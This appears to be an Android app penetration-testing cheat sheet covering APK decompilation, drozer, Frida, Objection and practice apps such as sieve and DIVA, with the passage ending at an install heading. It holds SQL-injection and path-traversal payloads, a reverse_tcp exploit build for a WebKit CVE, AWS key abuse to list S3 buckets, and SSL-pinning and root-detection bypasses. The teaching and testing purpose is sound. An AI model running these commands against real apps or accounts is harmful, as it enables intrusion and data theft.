Courses

Free

TryHackMe | Android Hacking 101TryHackMe

GitHub - ashishb/android-security-awesome: A collection of android security related resourcesGitHub

Android App PentestSecurity Workbook on Pentesting

MobileHackingCheatSheet/Mobile_Hacking_Android_cheatsheet_v1.0.pdf at master · randorisec/MobileHackingCheatSheetGitHub

0x01-ForewordMobile Security Testing Guide

Non-Free

Android Hacking And Penetration TestingUdemy

Labs

Complete

GitHub - t0thkr1s/allsafe: Intentionally vulnerable Android application.GitHub

GitHub - hafiz-ng/Beetlebug: Beetlebug is an open source insecure Android application with CTF challenges built for Android Penetration Testers and Bug Bounty hunters.GitHub

Precise

GitHub - t4kemyh4nd/vulnwebview: Intentionally vulnerable webview implementions in AndroidGitHub

Easy

GitHub - dineshshetty/Android-InsecureBankv2: Vulnerable Android application for developers and security enthusiasts to learn about Android insecuritiesGitHub

GitHub - payatu/diva-android: DIVA Android - Damn Insecure and vulnerable App for AndroidGitHub

GitHub - B3nac/InjuredAndroid: A vulnerable Android application that shows simple examples of vulnerabilities in a ctf style.GitHub

GitHub - rewanthtammana/Damn-Vulnerable-Bank: Damn Vulnerable Bank is designed to be an intentionally vulnerable android application. This provides an interface to assess your android application security hacking skills.GitHub

GitHub - logicalhacking/DVHMA: Damn Vulnerable Hybrid Mobile App (DVHMA) is an hybrid mobile app (for Android) that intentionally contains vulnerabilities.GitHub

GitHub - hax0rgb/InsecureShop: An Intentionally designed Vulnerable Android Application built in Kotlin.GitHub

GitHub - dan7800/VulnerableAndroidAppOracleGitHub

To Know

About Android Security Model

Two distinct layers to Android Security model.

1. Implemented in the OS, and isolates installed app from one another

• Each app has a specific UID, dynamically assigned.

• An app can only access its UID files and no other (except if shared by another app or OS)

• Each App runs as a separate process under a sperate UID

• Prior to Android 4.3 = the only thing that was isolating apps = if root compromised entire system was compromised

• Starting from Android 4.3 = SELinux

• SELinux denies all process interaction + create policies to allow only expected applications

2. Security of an App itself (made by the developers)

• The dev can selectively expose certain app functions to other apps

• Configures App capabilities

• All apps are in the /data/data folder (except if modified in manifest by dev)

• The permissions declared in the manifest will be translated in permissions in the file system.

About Apps

Structure

An Android App comprises two main elements:

1. The program's core functionality, written in Java code or Kotlin (official language today)

2. The XML files that specify various configurations, including string values and the app's identity.

Types

Native: They are those developed applications only and exclusively for mobile operating systems, either Android or IOS. In Android you use the Java or Kotlin programming language, while in IOS you make use of Swift or Objective-C. These programming languages are the official ones for the respective operating systems.

Hybrid: These applications use technologies such as HTML, CSS and JavaScript, all of these linked and processed through frameworks such as Apache Córdova "PhoneGap", Ionic, among others.

Directories

App directories in device

/data/data/<package_name>. By default, the apps databases, settings, and all other data go here.

• databases/: here go the app's databases

• lib/: libraries and helpers for the app

• files/: other related files

• shared_prefs/: preferences and settings

• cache/: well, caches

APK Anatomy

When decompiled :

• AndroidManifest.xml: contains the application’s package name, access rights, referenced libraries as well as other metadata.

• classes.dex: contains the application source code compiled in .dex file format.

• resources.arsc: contains the application’s precompiled resources.

• res/ : contains the application's resources not compiled into resources.arsc.

• lib/ : contains compiled code that is platform-dependent. Each sub-directory in lib/ contains the specific source code for respective processors.

• assets/ : contains the application’s assets.

• META-INF/ : contains the MANIFEST.MF file, which stores metadata about the application. It also contains the certificate and signature of the APK.

In this part we will extract the legitimate apk from emulator or the device and get the source code.

First Steps

# install tools
apt install adb apktool openjdk-11-jdk-headless zipalign apksigner

# list android attached devices
adb devices

# find app name
adb shell pm list packages -f | grep $app_name

# list installed packages
adb shell pm list packages -f

# get path of the app we want to reverse
adb shell pm path $package_name

# get the app on our local machine on current folder
adb pull $PATH_app .

Get the source code

Tools :

• jadx / jadx-gui

• dex2jar

• apktool

• apkx

jadx -d $path_output_folder app.apk

# or d2j
d2j-dex2jar.sh app.apk

# or apktool decompile
apktool d app.apk -o $output_folder

# or apkx
apkx app.apk
cd app
# open in visual studio
code .

# or use jadx-gui
jadx-gui app.apk
# Open the JAR file with JD-GUI and you’ll see its Java code.

Decompile/Compile Source Code

## Install app on android device
adb install app.apk

# decompile
apktool d app.apk -o app-decompile 

# remove app from phone 
adb uninstall app.apk

# recompile
apktool b app-decompile/ -o app.apk

# sign
# create keystore
keytool -genkey -v -keystore demo.keystore -alias demokeys -keyalg RSA -keysize 2048 -validity 10000
# sign the apk
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore demo.keystore -storepass demopass app.apk demokeys
## apksigner supports signature v1 to v4
apksigner sign --ks demo.keystore --ks-pass pass:$password app.apk

# verify the signature
jarsigner -verify app.apk
# zipalign the APK
zipalign 4 app.apk app_signed.apk

# also for signing :
## d2j-apk-sign
d2j-apk-sign app.apk -o app-signed.apk

## uber-apk-signer
java -jar uber-apk-signer.jar --apks app.apk

GitHub - bytedance/appshark: Appshark is a static taint analysis platform to scan vulnerabilities in an Android app.GitHub

Read Source Code

Check for :

1. Cryptography : Look for any use of encryption algorithms and verify that they are implemented correctly. Check for any hardcoded keys, weak encryption methods, or use of insecure cryptographic algorithms.

2. Code Obfuscation : Check for obfuscation techniques used to hide the code and make it difficult to understand. Obfuscation techniques make it harder for reverse engineering, but it can also hide any malicious code.

3. API Usage : Verify that the application does not use any insecure APIs or APIs with known vulnerabilities. Look for any APIs that allow unauthorized access or data leakage.

4. Reflection : Check for reflection, a feature that allows dynamic code execution. Verify that reflection is not used in a way that can allow an attacker to inject malicious code.

5. Dynamic Code Loading : Check for dynamic code loading, a feature that allows an application to load code at runtime. Verify that the application does not load code from untrusted sources or execute any code that is not verified.

6. Access Control : Verify that the application has implemented proper access control to sensitive functionality and data. Look for any hardcoded credentials or access tokens.

7. Hardcoded sensitive information : Check for any insecure storage of sensitive data such as passwords, user credentials, or personal information. Search for harcoded database(SQL queries), password, keys, sensitive information,URLs.

8. External Libraries : Verify that the application does not use any insecure third-party libraries or libraries with known vulnerabilities.

9. Integrity Checks : Look for any integrity checks that the application performs to ensure that the code has not been tampered with.

10. Native Code : If the application uses native code, verify that the native code is compiled securely and does not contain any vulnerabilities.

11. Web View related checks :

    1. setJavaScriptEnabled(): This method enables or disables the use of JavaScript in a web view. If this method is set to true, the web view can execute JavaScript code, which can be used to manipulate the web page or to communicate with the native Android code. However, if the application does not properly validate the input data sent to the web view, it could allow an attacker to inject malicious JavaScript code.

    2. setAllowFileAccess(): This method allows or denies access to local files in the device file system from the web view. If this method is set to true, the web view can access local files, which can be useful for displaying local HTML files or accessing data stored in the device file system. However, if the application does not properly validate the input data sent to the web view, it could allow an attacker to access or modify local files.

    3. setAllowUniversalAccessFromFileURLs : if this option is set to true , it can allow attackers to load their files inside WebViews.

    4. addJavascriptInterface(): This method allows JavaScript code in the web view to access the native Android code by exposing a Java object to JavaScript. This feature can be used to provide additional functionality or to interact with the native Android code. However, if the application does not properly validate the input data sent to the web view, it could allow an attacker to execute arbitrary Java code.

    5. runtime.exec(): This method is used to execute shell commands on the device. If an attacker can inject malicious input data into a web view and exploit an application vulnerability, it could allow the attacker to execute arbitrary shell commands on the device.

    6. onReceivedSslError : it tells the WebView to ignore SSL errors and proceed with the connection. Can be used by attackers to read or completely change the content being displayed to users.

12. SQLite related checks :

    1. openOrCreateDatabase() : function, it's used by SQLCipher to store key to encrypt DB. SQLiteDatabase database = SQLiteDatabase. **openOrCreateDatabase** (databaseFile, "test123", null);

13. Proxified activities :

    1. (((android:targetActivity)))=".someactivity"

14. TapJacking ;

    1. filterTouchesWhenObscured to find if vulnerable to tapjacking or not.

15. Root Detection Implementation details

16. SSL Pinning Implementation details

17. Exported Preference Activities

18. Apps which enable backups

19. Apps which are debuggable

20. App Permissions.

21. Firebase Instance(s) / AWS

Files :

AndroidManifest.xml

The Android Manifest is an XML file which contains important metadata about the Android app. This includes the package name, activity names, main activity (the entry point to the app), Android version support, hardware features support, permissions, and other configurations.

Check for :

• Permissions: Check if the application requests any sensitive permissions like camera, microphone, location, SMS, or call logs. If the app is requesting unnecessary permissions, it could be a red flag for privacy violations or potential security risks.

• Components: Android components like activities, services, receivers, and providers can be exploited by attackers to gain unauthorized access or to launch attacks. Check if any of the components are exposed to other applications or if they are exported with overly permissive access. android:exported: The default value of the attribute is true. (should be set to false)

• Intents: Intents are messages used by different Android components to communicate with each other. They can be used to launch activities, services, or broadcast messages. Check if the app is using any implicit intents that could be intercepted or manipulated by attackers.

• Allow debugable: true — Without a rooted phone it is possible to extract the data or run an arbitrary code using application permission (Should be false). The default value is “false”.

• Allow backup: true — The default value of this attribute is true. This setting defines whether application data can be backed up and restored by a user who has enabled usb debugging.(Should be false)

• Application information: Check if the application has any hard-coded credentials, sensitive information, or debugging features that could be exploited by attackers.

• Malware signatures: Check if the application has any malware signatures that could indicate that the app is malicious or potentially harmful.

• Target SDK version: Check if the app is targeting an older version of the Android SDK. If the app is not targeting the latest version, it could be vulnerable to known security vulnerabilities.

NOTE: All the permissions that the application requests should be reviewed to ensure that they don’t introduce a security risk.

res/values/strings.xml

This file stores the string resources for the application. It’s a good place to look for hardcoded secrets and info leaks.

Files .db or .sqlite

Look for these files to see what information is shipped along with the application. This is an easy source of secrets and info leaks.

Binary properties analysis

# decompile the APK
apktool d your_app.apk -o app
# Change directory to the lib folder
cd app/lib
# fin .so files
ls

# ASLR (PIE) check
readelf -h *.so | grep 'Type:'
# RELRO check
readelf -l *.so | grep GNU_RELRO
# Stack canaries check
objdump -d *.so | grep '__stack_chk_fail'
# NX bit check
readelf -W -l *.so | grep GNU_STACK

Information Gathering / Enumeration

Tools

apkinspector

Find permissions and dependencies used by an Android application.

GitHub - CameraKit/apk-inspectorGitHub

Copy

# install
git clone https://github.com/CameraKit/apk-inspector.git
cd apk-inspector
npm install -g .

# usage
apki -l ./Downloads/myapk.apk -c

apkid

Identifies many compilers, packers, obfuscators, etc. It's PEiD for Android.

GitHub - rednaga/APKiD: Android Application Identifier for Packers, Protectors, Obfuscators and Oddities - PEiD for AndroidGitHub

Copy

# install
pip install apkid

# usage
apkid app.apk

apkenum

Passive Enumeration Utility For Android Applications.

GitHub - shivsahni/APKEnumGitHub

Copy

# install
git clone https://github.com/shivsahni/APKEnum.git
cd APKEnum

# usage
python2 APKEnum.py -p $apk_file

apkleaks

Scanning APK file for URIs, endpoints & secrets.

GitHub - dwisiswant0/apkleaks: Scanning APK file for URIs, endpoints & secrets.GitHub

Copy

# install
git clone https://github.com/dwisiswant0/apkleaks
cd apkleaks/
pip3 install -r requirements.txt

# usage
python3 apkleaks.py -f $apk_file -o results.txt

Enumerate AWS buckets

Manual

1. Search in strings.xml for AWS key : <string name="aws_Identify_pool_ID">$key</string>

2. Extract data with this AWS key :

# install
apt-get install awscli
# usage
ws cognito-identity get-id --identity-pool-id $key --region $region
# region exemple : us-east-1
aws cognito-identity get-credentials-for-identity --identity-id $identity-id-from-previous-command --region $region

1. Enumerate permissions :

git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam/
pip install -r requirements.txt
python enumerate-iam.py --access-key <ACCESS-KEY-ID> --secret-key <SECRET-KEY-ID> --session-token <SESSION-TOKEN-VALUE>

1. Get content :

export AWS_ACCESS_KEY_ID=$access_key
export AWS_SECRET_ACCESS_KEY=$secret_key
export AWS_SESSION_TOKEN=$session_token

# list aws buckets
aws s3 ls

# list content
aws s3 ls s3://$bucket_name --recursive

1. Privilege Escalation

Cloud Enum

GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.GitHub

git clone https://github.com/initstring/cloud_enum.git
cd cloud_enum/
pip install requirements.txt
# usage
python3 cloud_enum.py -k $name_app

Firebase instances

Manual

# find instance in source code
cat /res/values/strings.xml | grep "firebase"
# looks like : https://xyz.firebaseio.com/

# or
# FireBaseScanner
git clone https://github.com/shivsahni/FireBaseScanner
cd FireBaseScanner/
# usage
python2 FirebaseMisconfig.py -p app.apk

1. Go to browser : https://xyz.firebaseio.com/.json

2. If "Permission Denied" : you cannot access it => well configured

3. Else, "null" or json data => db is public and you have at least read access

   1. Check for writing privileges :

      1. Insecure Firebase Exploit

git clone https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit.git
cd Insecure-Firebase-Exploit/
pip install -r requirements.txt
# usage
python2 Firebase_Exploit.py

Unobfuscated code - Frameworks

MobSF

GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.GitHub

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh

# running it
./run.sh 127.0.0.1:8000

# docker
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf

# go to browser : 0.0.0.0:8000

APKHunt - OWASP MASVS Static Analyzer

GitHub - Cyber-Buddy/APKHunt: APKHunt is a comprehensive static code analysis tool for Android apps that is based on the OWASP MASVS framework. Although APKHunt is intended primarily for mobile app developers and security testers, it can be used by anyone to identify and address potential security vulnerabilities in their code.GitHub

APKHunt is a comprehensive static code analysis tool for Android applications, based on OWASP's MASVS. It can be used to identify and address potential security vulnerabilities in application code.

git clone https://github.com/Cyber-Buddy/APKHunt.git
cd apkhunt
go run apkhunt.go -p app.apk -l

MARA

git clone --recursive https://github.com/xtiankisutsa/MARA_Framework
cd MARA_Framework
./mara.sh -s app.apk

QARK

git clone https://github.com/linkedin/qark
cd qark
pip install -r requirements.txt
pip install . --user  # --user is only needed if not using a virtualenv
qark --help

# apk
qark --apk app.apk

# java files
qark --java $path_java_folder
qark --java $file_java

Super Analyzer

GitHub - SUPERAndroidAnalyzer/super: Secure, Unified, Powerful and Extensible Rust Android AnalyzerGitHub

# installation
wget https://github.com/SUPERAndroidAnalyzer/super/releases/download/0.5.1/super-analyzer_0.5.1_debian_amd64.deb
dpkg -i super-analyzer_0.5.1_debian_amd64.deb

# usage
super-analyzer app.apk

Obfuscated code - Frameworks

• Simplify (Generic Android Deobfuscator)

• Java Deobfuscator

• Online Statistical Deobfuscation for Android - APK-Deguard

• How to :

Reverse engineering obfuscated Android APKMedium

Manual

Hardcoding Issues

Use of hard-coded password | OWASP Foundation

Sensitive information, such as API keys, passwords, and other credentials, are directly coded into the app's source code instead of being stored securely in a separate configuration file or database.

# Reverse Engineer the application :
apktool d app.apk
# or
jadx-gui app.apk
# look for sensitive infos such as passwords, api keys, etc...
# check /lib files

Often hardcoded strings can be found in resources/strings.xml and also in activity source code.

Insecure Data Storage

Sensitive information, such as user credentials, personal information, and other sensitive data, is stored in an insecure manner. This information can be stored locally on the device or remotely on a server or in the cloud.

cd  /data/data/com.$appname
# check shared_preferences file -> credentials may be stored !
# check databases file
# check tmp files
# check in external storages too :
cd /storage

In the docs, MAHH = Mobile Application Hacker’s Handbook

OWASP MAS Checklist - OWASP Mobile Application Security

Tools

Drozer

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make deb
# or :
wget https://github.com/WithSecureLabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
dpkg -i drozer_2.4.4.deb

# install drozer agent on device
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk

# open drozer agent app on device : turn it "on"
adb forward tcp:31415 tcp:31415

drozer console connect

Commands

# on drozer console
drozer console connect

'''
Info Gathering / Basics
'''
# list modules
list
# get packages list
run app.package.list -f $filter

# get basic info of package
run app.package.info -a $package_app

# view copied text via clipboard
run post.capture.clipboard

# dump androidmanifest.xml file
run app.package.manifest $package_app

# identify weaknesses
run app.package.attacksurface $package_app

# list exported activities / find private activities
run app.activity.info -a $package_app

# find browsable activities
run scanner.activity.browsable

# finding if app allows its data to be backed up
run app.package.backup -f $package_app

# bypass exported activity

# launch activity
run app.activity.start --component $package_app $package_app.$activity

'''
WebView
'''
# find if webview is exploitable
run scanner.misc.checkjavascriptbridge -a $package_app

'''
Content providers
'''
# get infos about content providers
run app.provider.info -a $package_app
# content provider vulnerabilities
run scanner.provider.injection -a $package_app
run scanner.provider.traversal -a $package_app

# Database-backed Content Providers (Data Leakage)
run scanner.provider.finduris -a $package_app
# query accessible content URIs
run app.provider.query content://$content

# Database-backed Content Providers (SQLi)
run app.provider.query content://$accessible_content
--projection "'"
run app.provider.query content://$accessible_content
--selection "'"

'''
Services
'''
# list service
run app.service.info -a $package_app
# interact with service
# app.service.send 
# app.service.start  # Start Service                                       
# app.service.stop   # Stop Service
run app.service.send $package_app $ $package_app.$service --msg 2354 9234 1 --extra string $package_app.PIN 1337 --bundle-as-obj

'''
Broadcast Receivers
'''
# broadcast receivers
run app.broadcast.info # Detects all broadcast receivers on device
# check for app
run app.broadcast.info -a $package_app
# interactions
# app.broadcast.info          Get information about broadcast receivers           
# app.broadcast.send          Send broadcast using an intent                      
# app.broadcast.sniff         Register a broadcast receiver that can sniff particular intents
# i.e. : send SMS on app
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"

'''
Debug
'''
# find debuggable apps
run app.package.debuggable

# You can run commands as that app if it is debuggable
shell@android:/ $ run-as $package_app

'''
Exploits / Shellcode
'''
# on host terminal
drozer exploit list
drozer shellcode list

# example : CVE-2010-1807
drozer exploit build exploit.remote.webkit.nanparse –-payload weasel.reverse_tcp.armeabi  
--server 10.0.2.2:31415 --push-server 127.0.0.1:31415 --resource /home.html

PID Cat

Tool showing log entries for a specific application package when debug=true in the application.

# installation
git clone https://github.com/JakeWharton/pidcat.git
cd pidcat

# usage
python pidcat.py $package_name

Inspeckage

Releases · ac-pm/InspeckageGitHub

Information gathering

• Requested Permissions;

• App Permissions;

• Shared Libraries;

• Exported and Non-exported Activities, Content Providers,Broadcast Receivers and Services;

• Check if the app is debuggable or not;

• Version, UID and GIDs;

Hooks With the hooks, we can see what the application is doing in real time:

• Shared Preferences (log and file);

• Serialization;

• Crypto;

• Hashes;

• SQLite;

• HTTP (an HTTP proxy tool is still the best alternative);

• File System;

• Miscellaneous (Clipboard, URL.Parse());

• WebView;

• IPC.

adb install mobi.acpm.inspeckage.apk
# go to the device : launch inspeckage
# open web browser : http://127.0.0.1:8008 on mobile

Manual

Exported Activities / Service

One time, I used an exported activity as a very good way to bypass the MFA on an app ☺️

In AndroidManifest.xml, check for exported activities :

cat AndroidManifest.xml | grep 'exported="true"'

# true : activity can be launched by any other applications.
# false : only the application can launch it.

# launch exported activity
adb shell am start -n $package_name/.$activity

# or drozer

Exploit Service (1)

Android Application Security Part 16 – Attacking Services – Aditya Agrawal

When a service is exported without any permission restriction, any application can bind to the service and access the function implemented in the service.

# start
adb shell am startservice app.beetlebug/app.beetlebug.handlers.VulnerableService
# stop
adb shell am force-stop app.beetlebug/app.beetlebug.handlers.VulnerableService
# status
dumpsys activity services $server_service

Exploit Service (2)

1. Get Services

dz> run app.service.info -a com.mwr.example.sieve

1. Exploiting handleMessage() function in sieve (Code analysis of AuthService services)

dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj

• In above request, PIN 1337 can be bruteforced.

• Refer to Page 211 of MAHH.

1. Exploiting CryptoService to encrypt a message

dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 3452 2 3 --extra string com.mwr.example.sieve.KEY testpassword --extra string com.mwr.example.sieve.STRING "string to be encrypted" --bundle-as-obj

The parameters passed in --msg are extra parameters. Analyze code and use the parameters mentioned there, and add extra till 3 parameters are completed. --msg expects three parameters.

Vulnerable Content Provider

Exploiting Content ProvidersRedfox Security

A content provider component supplies data from one application to others on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be stored in a database, in files, or even over a network.

cat AndroidManifest.xml | grep "<provider"
# search for :
# android:enabled="true"
# android:exported="true"
# check the permissions

# drozer console
run app.provider.info -a $package_app
# check source code for content providers URI

# query it :
run app.provider.query $content_provider_URI --vertical

SQLi's

1. SQLi on Content provider connected to DB using projection parameter

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "'"

1. Automating SQLi on Content Providers

dz> run scanner.provider.sqltables -a content://com.mwr.example.sieve.DBContentProvider/Passwords

1. Used to start a localhost server to show content providers and run sqlmap like tools

dz> run auxiliary.webcontentresolver -p 9999

1. Automating SQLi scan on all content providers on the device

dz> run scanner.provider.injection

Traversals

1. Reading external files using Content Providers

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/system/etc/hosts

1. Directory Traversal to read /databases in sieve

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../data/data/com.mwr.example.sieve/databases/database.db >database.db

1. Automating Traversals

dz> run scanner.provider.traversal -a content://com.mwr.example.sieve.FileBackupProvider

Insecure Logging

Sensitive information, (usernames, passwords, and other user data), is stored or printed in an insecure manner. This means that this information is easily accessible to anyone with access to the logs, which could potentially be a malicious actor who gains access to the device.

# make sure you installed frida
# find pid of app
frida-ps -Uai

# get logs of the app :
adb logcat --pid=2244
# or without frida : 
adb logcat | grep "$(adb shell ps | grep $app_name | awk '{print $2}')"

# find logged infos by the app when you log in, etc
adb logcat --pid=2244 | grep "password"

Input Validation Issues

Input data from users, such as login credentials, user input, and other user-generated data, is not properly validated before being used by the application. Check for :

• SQLi

• XSS

• Code Injection

• BOF

• File Inclusion

• etc.

Access Control Issues

Access controls, such as authentication and authorization mechanisms, are not properly implemented or enforced. This can lead to unauthorized access to sensitive information, data theft, and other security breaches.

Try to access "sensitive" activities from outside the app :

# list activities with adb
adb shell dumpsys package | grep -i ' + package.name + ' | grep Activity

# use adb
adb shell am start -n $app_name/.$activity

# Let’s try to access activity using content provider.
adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes/

adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

Deep Link Exploitation

What is it ?

Deep links are basically hyperlinks that allow users to directly open specific views inside an android application. Examine the AndroidManifest.xml file and search for android:scheme attributes inside <data> tags to find the deep link defined.

• Explanations :

  • Deep Link Exploitation - AllSafe

  • Deep Links URL Schemes - HackTricks

cat AndroidManifest.xml | grep "<data"
# locate scheme, host and pathPrefix
# query
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" $package_name

WebView Attacks

Webview AttacksHackTricks

WebView addJavascriptInterface Remote Code Execution

WebView is a view that allows an application to load web pages within it. Internally it uses web rendering engines such as Webkit. The Webkit rendering engine was used prior to Android version 4.4 to load these web pages. On the latest versions (after 4.4) of Android, it is done using Chromium. When an application uses a WebView, it is run within the context of the application, which has loaded the WebView. To load external web pages from the Internet, the application requires INTERNET permission in its AndroidManifest.xml file:

<uses-permission android:name="android.permission.INTERNET"></uses-permission>

• Accessing sensitive local resources through file scheme When an Android application uses a WebView with user controlled input values to load web pages, it is possible that users can also read files from the device in the context of the target application.

Insecure Broadcast Receiver

BroadcastReceiver is an android component that listens to system-wide broadcast events or intents. Examples of these broadcasts are when your phone’s battery is running low then a broadcast indicating the low battery condition is sent. Some apps could be configured to listen for this broadcast and lower its power consumption and maybe lower the brightness on your screen, etc…

How to Exploit

1. Examine AndroidManifest.xml

   1. Check for <receiver> tags

2. Check in the code where the broadcast receiver is, for the onReceivefunction and see how it handles broadcasts it receives.

3. Try to exploit it by sending customized notification

• Exploiting It

Exploit Example

1. Fetch Broadcast Receivers

dz> run app.broadcast.info -a com.mwr.example.browser

1. If an app expects a broadcast receiver to catch an intent and then show authenticated activities, generation of that broadcast is only possible after login. But after code review, an attacker can manually send that intent using drozer. Sample broadcast receiver:

<receiver android:name=".LoginReceiver"
android:exported="true">
<intent-filter>
<action android:name="com.myapp.CORRECT_CREDS" />
</intent-filter>
</receiver>

dz> run app.broadcast.send --action com.myapp.CORRECT_CREDS

(Page 217 - MAHH)

1. Intent Sniffing/Catching intents using broadcast receivers which were meant for other Broadcast Receivers

dz> run app.broadcast.sniff --action android.intent.action.BATTERY_CHANGED
dz> run app.broadcast.sniff --action com.myapp.USER_LOGIN

(name of action sending the broadcast)

Weak Cryptography

Use frida to hook some encryption methods and obtain sensitive information like Encryption key, IV Encryption Algorithm, etc…

frida -U --codeshare fadeevab/intercept-android-apk-crypto-operations -f $package

Object Deserialization

Taking data structured in some format, and rebuilding it into an object.

• Explanations : https://justahmed.github.io/android/Allsafe-Walkthrough-Part-1/#14-object-serialization

Insecure Providers

The goal is to assess the implementation and see if you can leak both info from the database and sensitive files accessed by the File Provider.

1. Check AndroidManifest.xml and search for <provider> tags

   1. For this provider :

<provider android:name="infosecadventures.allsafe.challenges.DataProvider" android:enabled="true" android:exported="true" android:authorities="infosecadventures.allsafe.dataprovider"/>

It is exported, so easier. Query it :

adb shell content query --uri "content://infosecadventures.allsafe.dataprovider"

Disable SSL Pinning

Resources :

It's all about Bypassing Android SSL Pinning and Intercepting Proxy Unaware applications.Medium

Android SSL Pinning Bypass With FridaCertCube Labs

Frida

# install
pip install frida-tools

# get android device architecture
getprop ro.product.cpu.abi

# get frida-server depending on the android device architecture
# https://github.com/frida/frida/releases
# extract it
adb push /path/to/frida-server /data/local/tmp

# Push the Burp Suite SSL certificate to the device
adb push /path/to/burpca-cert-der.crt /data/local/tmp/cert-der.crt

# Now we will need to make the server executable
adb shell “chmod 755 /data/local/tmp/frida-server”

# With the frida-server and certificate in place we need to execute it.
adb shell

# Once you have a shell switch to the root user of the device.
su

# Lastly, we will move to the correct folder and execute frida-server
cd /data/local/tmp
./frida-server

# SCRIPTS
# https://codeshare.frida.re/@akabe1/frida-multiple-unpinning/
# https://codeshare.frida.re/@akabe1/frida-multiple-unpinning/
# https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/
# https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

# ON HOST
# hook the script using Frida using the command:
frida -U -f $package script.js

# via codeshare
frida -U --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f $package

APK-MITM

# install
npm install -g apk-mitm

# usage
apk-mitm $apk
# reinstall the app
adb uninstall $package-app
adb install $apk_patched

Magisk - Move Certificates Module

1. Download Magisk.apk : https://github.com/topjohnwu/Magisk/releases

2. Launch it in your device : Allow SuperUser access

3. Follow : https://www.xda-developers.com/how-to-install-magisk/

4. Enable MagiskHide : Magisk App > Modules > Enable 'Move Certificates'

Objection

pip3 install objection

# start frida server on android device
adb shell 
cd /data/local/tmp
./frida-server

# on host
objection -g “com.package.android” explore
android sslpinning disable

Modifying the network_security_config.xml file

The Network Security Configuration lets apps customize their network security settings through a declarative configuration file. The entire configuration is contained within this XML file, and no code changes are required. The Network Security Configuration works in Android 7.0 or higher.

1. Install Burp CA certificate on the device.

2. Decompile the android application with apktool : apktool d app.apk -o app-decompile

3. Locate the network_security_config.xml file under /res/xml

4. Remove the <pin-set>...</pin-set> tag section and add :

<trust-anchors>
	<certificates src="user" />
	<certificates src="system" />
</trust-anchors>

1. If the network_security_config.xml file is not present in the application, the AndroidManifest.xml file must also be modified by adding the networkSecurityConfig tag as follows :

   Copy

   <application android:name="AppName" android:networkSecurityConfig="@xml/network_security_config">

2. Save the file and repackage the application: apktool b app-decompile -o app-ssl.apk.

3. Sign the application (see Reversing > Decompilation)

To understand root detection, we must first understand what rootage is. Rooting is the process of obtaining the highest privileges possible on the operating system. In the case of Android, rooting allows you to change or replace applications, files and system settings, and run specialized applications ("apps") that require administrator-level permissions. Root detection is the process of detecting whether a device is rooted. This is usually done when the application is launched. Sometimes root checks are implemented in applications such that the application will not respond or exit when running on a rooted device.

Resources :

Android Root Detection Bypass Using Frida | Redfox SecurityRedfox Security

My fav 7 methods for Bypassing Android Root detectionMedium

Frida

# verify frida connection
frida-ls-devices

# find package name
frida-ps -Ua

# Take one script :
# https://codeshare.frida.re/@dzonerzy/fridantiroot/
# https://gist.githubusercontent.com/pich4ya/0b2a8592d3c8d5df9c34b8d185d2ea35/raw/db83ed8d4d3dfc29687724e4393e173362b1d7a9/root_bypass.js
# hook the script using Frida using the command:
frida -U -f $package frida-root.js

Objection

Common method

# instal
pip3 install objection

# start frida server on android device
adb shell 
cd /data/local/tmp
./frida-server

objection -g “com.package.android” explore
android root disable
# else
android root simulate

Manual method

1. Convert the apk file into class files using dex2jar

2. Analyse the class files and identify which library is being used for the root detection (for example, de.cyberkatze.iroot)

3. Connect the app with objection : objection -g “com.package.android” explore

4. Execute in objection : android hooking list class_methods <root detection class> 2. Change return value for the method in charge of Root Detection : android hooking set return_value <root_detect_class.method> false

5. For de.cyberkatze.iroot, in objection :

   1. android hooking list class_methods de.cyberkatze.iroot.IRoot

   2. Change return value for the method : android hooking set return_value de.cyberkatze.iroot.IRoot.isDeviceRooted false

Tampering Smali Code

1. Decompile the apk file using JADX-GUI or any other alternative.

2. Identify the code which is in charge of the root detection process

   1. If the library rootbear is used and there is an 'if' condition to verify if the device is rooted or not :

      1. Decompile the apk with apktool : ``apktool d app.apk -o app-decompile```

      2. Find the SMALI code for the 'if' statement (can look like this) : if-eqz v0, :cond_0

      3. Change it by : if-nez v0, :cond_0

      4. Save the file and rebuild the application : apktool b app-decompile -o app-root-patch.apk

      5. Sign the application (see '## Decompile/Compile Source Code)

      6. Re-install the application on the android device

AndroPass

GitHub - koengu/AndRoPass: Android Root and Emulator Detection Bypass ToolGitHub

Allows to bypass root and emulator detection. Can also bypass the RootBeer detection mechanism.

# installation
git clone https://github.com/koengu/AndRoPass.git
pip install -r requirements.txt

# usage
python3 AndRoPass.py -a app.apk

Medusa Framework

GitHub - Ch0pin/medusa: Binary instrumentation framework based on FRIDAGitHub

# install
